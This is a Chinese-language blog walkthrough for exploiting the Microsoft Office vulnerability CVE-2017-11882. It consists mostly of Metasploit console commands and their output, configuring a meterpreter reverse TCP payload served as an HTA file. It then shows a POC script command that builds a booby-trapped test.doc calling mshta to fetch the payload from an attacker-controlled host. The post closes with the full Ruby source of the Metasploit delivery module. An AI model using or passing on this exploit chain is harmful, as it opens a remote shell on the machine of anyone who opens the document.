Office全版本漏洞CVE-2017-11882利用复现
漏洞分析
POC
命令利用请参考上面poc中的内容
msf利用过程
在msf中使用模块生成hta文件
msf > use exploit/windows/office/CVE-2017-11882
msf exploit(CVE-2017-11882) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(CVE-2017-11882) > show options
Module options (exploit/windows/office/CVE-2017-11882):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
这里可以设定生成的url路径
msf exploit(CVE-2017-11882) > set URIPATH 1
设定回连ip和端口
msf exploit(CVE-2017-11882) > set LHOST x.x.x.x
msf exploit(CVE-2017-11882) > set LPORT 4455
执行exploit
msf exploit(CVE-2017-11882) > exploit
[*] Exploit running as background job 0.
[-] Handler failed to bind to 192.168.1.1:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Using URL: http://0.0.0.0:8080/1
[*] Local IP: http://192.168.114.128:8080/1
[*] Server started.
[*] Place the following DDE in an MS document:
mshta.exe "http://192.168.1.1:8080/1
如果受害者从url下载了文件会有提示
也可以把这个生成的文件放在外部的vps上,在设定ip的机器上监听回连shell也可以
随后使用POC生成doc文件
┌─[parrot@parrot]─[~/Desktop/CVE-2017-11882]
└──╼ $python '/home/aresx/Desktop/CVE-2017-11882/Command_CVE-2017-11882.py' -c "mshta http://192.168.114.128:8080/1" -o 'test.doc'
[*] Done ! output file >> test.doc <<
受害者打开doc文件,监听机便收到了会话
Metasploit模块CVE-2017-11882.rb
保存到目录usr/share/metasploit-framework/modules/exploits/windows/office/
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Office Payload Delivery',
'Description' => %q{
This module generates an command to place within
a word document, that when executed, will retrieve a HTA payload
via HTTP from an web server. Currently have not figured out how
to generate a doc.
},
'License' => MSF_LICENSE,
'Arch' => ARCH_X86,
'Platform' => 'win',
'Targets' =>
[
['Automatic', {} ],
],
'DefaultTarget' => 0,
))
end
def on_request_uri(cli, _request)
print_status("Delivering payload")
p = regenerate_payload(cli)
data = Msf::Util::EXE.to_executable_fmt(
framework,
ARCH_X86,
'win',
p.encoded,
'hta-psh',
{ :arch => ARCH_X86, :platform => 'win '}
)
send_response(cli, data, 'Content-Type' => 'application/hta')
end
def primer
url = get_uri
print_status("Place the following DDE in an MS document:")
print_line("mshta.exe \"#{url}\"")
end
end
*转载请注明来自AresX’s Blog